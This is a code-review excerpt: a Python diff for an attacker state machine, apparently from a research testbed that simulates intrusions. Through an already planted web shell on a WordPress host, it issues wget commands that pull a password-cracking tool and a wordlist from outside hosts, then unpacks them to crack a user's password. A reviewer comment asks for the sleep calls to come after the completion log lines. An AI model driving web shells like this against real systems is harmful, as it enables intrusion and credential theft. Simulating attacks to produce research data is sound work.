src/cr_kyoushi/statemachines/aecid_attacker/actions.py

```diff
@@ -510,6 +511,124 @@ def __call__(
+            hashcrack_url: url of the hashcrack tar.
+            file_name: name of the hashcrack tar.
+            wl_host: address of the host where wordlist is available.
+            attacked_user: the name of the WP user to crack the password.
+            tar_download_name: the name of the hashcrack tar after downloading.
+            cmd_param: the GET parameter to embed the command in.
+            verify: if HTTPS connection should very TLS certs.
+            timeout: the maximum time to wait for the web server to respond.
+            sleep_time: the waiting time between executed requests.
+        """
+        self.url = hashcrack_url
+        self.file_name = file_name
+        self.wl_host = wl_host
+        self.attacked_user = attacked_user
+        self.tar_download_name = tar_download_name
+        self.cmd_param = cmd_param
+        self.verify = verify
+        self.timeout = timeout
+        self.sleep_time = sleep_time
+
+    def __call__(
+        self,
+        log: BoundLogger,
+        current_state: str,
+        context: Context,
+        target: Optional[str],
+    ):
+        web_shell = context.web_shell
+        log = log.bind(
+            url=self.url,
+            wl_host=self.wl_host,
+            attacked_user=self.attacked_user,
+            web_shell=web_shell,
+        )
+        if web_shell is not None:
+            log.info("Downloading WPHashCrack")
+            archive_download_cmd = ["wget", self.url + self.file_name]
+            if self.tar_download_name is not None:
+                archive_download_cmd += ["-O", self.tar_download_name]
+            output = send_request(
+                log,
+                web_shell,
+                archive_download_cmd,
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Downloaded WPHashCrack")
+            log.info("Unarchiving WPHashCrack")
+            if self.tar_download_name is None:
+                self.tar_download_name = self.file_name
+            output = send_request(
+                log,
+                web_shell,
+                ["tar", "xvfz", self.tar_download_name],
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Unarchived WPHashCrack")
+            log.info("Downloading password list")
+            output = send_request(
+                log,
+                web_shell,
+                ["wget", self.wl_host],
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Downloaded password list")
```

Comment:
Please make sure that you sleep after you log the command completion for all of these. 
Otherwise the log lines will be added way after the actual action completed.
The reverse obviously holds for the command started messages generally don't put any additional code between the line starting the action and its 2 log lines to get timestamps that are as close to actual start and completion as possible